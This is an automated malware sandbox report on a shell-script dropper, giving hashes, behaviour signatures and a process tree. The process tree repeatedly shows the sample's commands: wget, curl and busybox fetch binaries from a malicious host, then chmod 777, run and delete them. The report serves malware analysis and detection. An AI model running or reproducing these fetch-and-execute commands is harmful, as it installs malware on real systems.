Analysis
-
max time kernel
150s -
max time network
156s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:07
Static task
static1
Behavioral task
behavioral1
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
-
Size
10KB
-
MD5
5ad9fce74e2c2c2bc17e1c3c7c1e9699
-
SHA1
f6a06bb0801544767f9542e687c8970f4da13169
-
SHA256
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda
-
SHA512
70e49474c5684e1b77cc2e47abe567e6d5e8b0f7edfca79a7feefe0ae389462b6747c2841c31acb7168e04c121a563d887515cbdb75530dca80da2ade3b95d16
-
SSDEEP
192:MAM8A8b2OyaeCz0sbcqmss0xFw/3xe3rhxFw/3Vfqmsl3rD3A8b2OneCz0sT:MA0aeCz0sbcqmss0xFw/3oxFw/31qmsJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 814 chmod 822 chmod 866 chmod 944 chmod 739 chmod 829 chmod 929 chmod 731 chmod 788 chmod 873 chmod 887 chmod 894 chmod 901 chmod 936 chmod 951 chmod 749 chmod 764 chmod 880 chmod 908 chmod 915 chmod 922 chmod -
Executes dropped EXE 21 IoCs
ioc pid Process /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 733 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM 740 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 750 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI 765 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy 790 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H 815 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 823 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn 830 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 867 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 874 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 881 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 888 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 895 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 902 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 909 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 916 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 923 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 930 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 937 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 945 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 952 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 61 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 918 wget 941 curl 794 wget 912 curl 926 curl 828 busybox 921 busybox 708 wget 743 curl 738 busybox 855 curl 863 busybox 883 wget 914 busybox 916 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 730 busybox 869 wget 890 wget 925 wget 776 curl 905 curl 911 wget 917 rm 939 wget 872 busybox 818 wget 877 curl 879 busybox 785 busybox 819 curl 821 busybox 826 curl 870 curl 891 curl 895 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 928 busybox 812 busybox 950 busybox 761 busybox 904 wget 742 wget 736 curl 752 wget 825 wget 832 wget 893 busybox 947 wget 948 curl 735 wget 876 wget 886 busybox 748 busybox 753 curl 884 curl 896 rm 943 busybox 717 curl 800 curl 919 curl 770 wget 907 busybox -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy curl File opened for modification /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H curl File opened for modification /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 curl File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl File opened for modification /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI curl File opened for modification /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl
Processes
-
/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:708
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:730
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:734
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:735
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:738
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:761
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:769
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:776
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:785
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:792
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:794
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:812
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:828
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:831
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:895
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:900
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:916
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:935
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
